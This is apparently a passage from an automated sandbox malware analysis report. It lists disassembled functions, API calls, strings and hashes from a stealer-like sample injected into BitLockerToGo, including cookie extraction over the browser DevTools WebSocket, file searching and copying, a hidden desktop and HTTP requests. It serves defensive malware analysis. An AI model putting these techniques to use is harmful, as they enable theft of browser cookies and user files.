                                                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 008E825D
                                                                                                                                                                                                                                                                                                                    • WSACleanup.WS2_32 ref: 008E826E
                                                                                                                                                                                                                                                                                                                    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 008E82CD
                                                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 008E82DD
                                                                                                                                                                                                                                                                                                                    • WSACleanup.WS2_32 ref: 008E82E3
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • :, xrefs: 008E816B
                                                                                                                                                                                                                                                                                                                    • ws://, xrefs: 008E8055
                                                                                                                                                                                                                                                                                                                    • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 008E8435
                                                                                                                                                                                                                                                                                                                    • HTTP/1.1Host: , xrefs: 008E83AB
                                                                                                                                                                                                                                                                                                                    • {"id":1,"method":"Network.getAllCookies"}, xrefs: 008E859F
                                                                                                                                                                                                                                                                                                                    • Sec-WebSocket-Version: 13, xrefs: 008E847A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Cleanup_memmove$StartupXinvalid_argumentclosesocketgetaddrinfomemchrsocketstd::_
                                                                                                                                                                                                                                                                                                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Network.getAllCookies"}
                                                                                                                                                                                                                                                                                                                    • API String ID: 2519114892-1552268179
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e54ed733ba18062eccb0bdfa8c2f1de6757a979d4e655103e5f12f316ff7087f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ea471125ce9a1df1e720ec24391fd3c65a9de5619b7e26103a5bbc2be33637c0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e54ed733ba18062eccb0bdfa8c2f1de6757a979d4e655103e5f12f316ff7087f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C624731D042ACAEDB219B298C856EDB7B5FF05310F5041EAE29DE2592CAB05FC5CF52
                                                                                                                                                                                                                                                                                                                    Function 008F6A05 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1989 8f6a05-8f6aac call 90fc10 wsprintfA FindFirstFileA call 905490 * 2 1996 8f6e68-8f6e7e call 8e1cce call 8fe88c 1989->1996 1997 8f6ab2-8f6ac6 StrCmpCA 1989->1997 1998 8f6acc-8f6ae0 StrCmpCA 1997->1998 1999 8f6e35-8f6e4a FindNextFileA 1997->1999 1998->1999 2001 8f6ae6-8f6b28 wsprintfA StrCmpCA 1998->2001 2003 8f6e5c-8f6e62 FindClose 1999->2003 2004 8f6e4c-8f6e4e 1999->2004 2005 8f6b2a-8f6b45 wsprintfA 2001->2005 2006 8f6b47-8f6b59 wsprintfA 2001->2006 2003->1996 2004->1997 2008 8f6b5c-8f6b99 call 905490 lstrcat 2005->2008 2006->2008 2012 8f6bbf-8f6bc6 strtok_s 2008->2012 2013 8f6b9b-8f6bac 2012->2013 2014 8f6bc8-8f6c06 call 905490 lstrcat strtok_s 2012->2014 2019 8f6dc6-8f6dca 2013->2019 2020 8f6bb2-8f6bbe 2013->2020 2018 8f6c0c-8f6c1c PathMatchSpecA 2014->2018 2014->2019 2021 8f6d16-8f6d2b strtok_s 2018->2021 2022 8f6c22-8f6cfb call 8f2143 call 8f38a6 call 8f2265 call 8f2223 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 5 DeleteFileA CopyFileA call 8f3dfd call 910840 2018->2022 2019->1999 2023 8f6dcc-8f6dd2 2019->2023 2020->2012 2021->2018 2024 8f6d31 2021->2024 2059 8f6cfd-8f6d11 DeleteFileA call 8e2910 2022->2059 2060 8f6d36-8f6d42 2022->2060 2023->2003 2026 8f6dd8-8f6de6 2023->2026 2024->2019 2026->1999 2028 8f6de8-8f6e2a call 8e1ced call 8f6a05 2026->2028 2036 8f6e2f 2028->2036 2036->1999 2059->2021 2062 8f6d48-8f6d6e call 8f2175 call 8e9148 2060->2062 2063 8f6e53-8f6e5a call 8e2910 2060->2063 2071 8f6dba-8f6dc1 call 8e2910 2062->2071 2072 8f6d70-8f6db4 call 8e1ced call 8f2143 call 8f8be6 call 8e2910 2062->2072 2063->1996 2071->2019 2072->2071
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F6A59
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 008F6A70
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F6A8C
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F6A9D
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917A38), ref: 008F6ABE
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00917A3C), ref: 008F6AD8
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F6AFF
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091766E), ref: 008F6B13
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F6B3C
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F6B53
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F6B65
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F6B7A
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008F6BBF
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F6BD1
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008F6BE6
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008F6BFF
                                                                                                                                                                                                                                                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 008F6C14
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00917A68,0091766F), ref: 008F6CCD
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008F6CDD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3DFD: CreateFileA.KERNEL32(008F6CE9,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,008F6CE9,?), ref: 008F3E18
                                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F6CF3
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 008F6CFE
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008F6D24
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 008F6E42
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008F6E62
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                                                                    • API String ID: 956187361-332874205
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fc4f8c26c7d2862a97e678a43033f3b118c3f69bbf7b30b20246ba8a8934fa78
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 32f60b5ee871cb4beff3689104090a8e89825745332156658171120c3e0057ac
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc4f8c26c7d2862a97e678a43033f3b118c3f69bbf7b30b20246ba8a8934fa78
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05C1F7B2E0021EABCF22AB64DC45AEE777DFF04304F4045A1FA08E3151EA71AB958F51
                                                                                                                                                                                                                                                                                                                    Function 6C9735A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 2175 6c9735a0-6c9735be 2176 6c9735c4-6c9735ed InitializeCriticalSectionAndSpinCount getenv 2175->2176 2177 6c9738e9-6c9738fb call 6c9ab320 2175->2177 2178 6c9735f3-6c9735f5 2176->2178 2179 6c9738fc-6c97390c strcmp 2176->2179 2182 6c9735f8-6c973614 QueryPerformanceFrequency 2178->2182 2179->2178 2181 6c973912-6c973922 strcmp 2179->2181 2184 6c973924-6c973932 2181->2184 2185 6c97398a-6c97398c 2181->2185 2186 6c97374f-6c973756 2182->2186 2187 6c97361a-6c97361c 2182->2187 2188 6c973622-6c97364a _strnicmp 2184->2188 2189 6c973938 2184->2189 2185->2182 2191 6c97396e-6c973982 2186->2191 2192 6c97375c-6c973768 2186->2192 2187->2188 2190 6c97393d 2187->2190 2194 6c973944-6c973957 _strnicmp 2188->2194 2195 6c973650-6c97365e 2188->2195 2189->2186 2190->2194 2191->2185 2193 6c97376a-6c9737a1 QueryPerformanceCounter EnterCriticalSection 2192->2193 2196 6c9737b3-6c9737eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2193->2196 2197 6c9737a3-6c9737b1 2193->2197 2194->2195 2198 6c97395d-6c97395f 2194->2198 2195->2198 2199 6c973664-6c9736a9 GetSystemTimeAdjustment 2195->2199 2200 6c9737ed-6c9737fa 2196->2200 2201 6c9737fc-6c973839 LeaveCriticalSection 2196->2201 2197->2196 2202 6c973964 2199->2202 2203 6c9736af-6c973749 call 6c9ac110 2199->2203 2200->2201 2204 6c973846-6c9738ac call 6c9ac110 2201->2204 2205 6c97383b-6c973840 2201->2205 2202->2191 2203->2186 2210 6c9738b2-6c9738ca 2204->2210 2205->2193 2205->2204 2211 6c9738dd-6c9738e3 2210->2211 2212 6c9738cc-6c9738db 2210->2212 2211->2177 2212->2210 2212->2211
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9FF688,00001000), ref: 6C9735D5
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9735E0
                                                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C9735FD
                                                                                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C97363F
                                                                                                                                                                                                                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C97369F
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C9736E4
                                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C973773
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FF688), ref: 6C97377E
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FF688), ref: 6C9737BD
                                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C9737C4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FF688), ref: 6C9737CB
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FF688), ref: 6C973801
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C973883
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C973902
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C973918
                                                                                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C97394C
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                                                                                    • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7a8ffbf83bd514519975cd80037cfd8359b0eb2f503791162dfa604506fb0c43
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d0d750ac90ff1056bfa2ca1ce8a314314345509aeaea448e97a0786b2fb90ce2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a8ffbf83bd514519975cd80037cfd8359b0eb2f503791162dfa604506fb0c43
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B1B2B1B093149BDB18DF38D44465E7BF9BB8A704F24892DE9A9D3750EB30D801CB91
                                                                                                                                                                                                                                                                                                                    Function 008F7D20 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                                                    • API String ID: 2178766154-445461498
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c43915977e72845dd79605e81c408ae41a2ae5eaa2468f41fcc761d060ebcb50
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 450fe5d455ac65c77ee1d8e3b3307bf259c8fcec0e870d7806f08be6543b5679
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c43915977e72845dd79605e81c408ae41a2ae5eaa2468f41fcc761d060ebcb50
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6810671E0022DABCF60EB65DC45ADAB7B8FF04305F0085E5A648E3111DE75AB9A8F91
                                                                                                                                                                                                                                                                                                                    Function 008E8DEA Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 149stringsleepprocessCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8E2B
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008E8E44
                                                                                                                                                                                                                                                                                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 008E8E5D
                                                                                                                                                                                                                                                                                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 008E8E79
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8E99
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E8EAE
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E8EC1
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,0091821C), ref: 008E8ED3
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8EE2
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008E8F13
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8F30
                                                                                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 008E8F8B
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 008E8F9A
                                                                                                                                                                                                                                                                                                                    • CloseDesktop.USER32(?), ref: 008E8FCF
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                                                    • API String ID: 3792893142-3777181503
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d8ed34e31a20707fd5bd40e27a88e169f6265594ac1a82493939c76e6a47f4d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 27d9307f3b1d3f23a6c54a8730ebae244b0218610539f3ade40b1ff6d8840e2c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d8ed34e31a20707fd5bd40e27a88e169f6265594ac1a82493939c76e6a47f4d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38510DB190021CAFDB22DF64DC8AFDA77BCFB08754F400495B609E2151DA709B858F61
                                                                                                                                                                                                                                                                                                                    Function 008E688F Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E68F1
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E690B
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E693A
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E6979
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E69A9
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E69B4
                                                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E69D8
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 008E6A6C
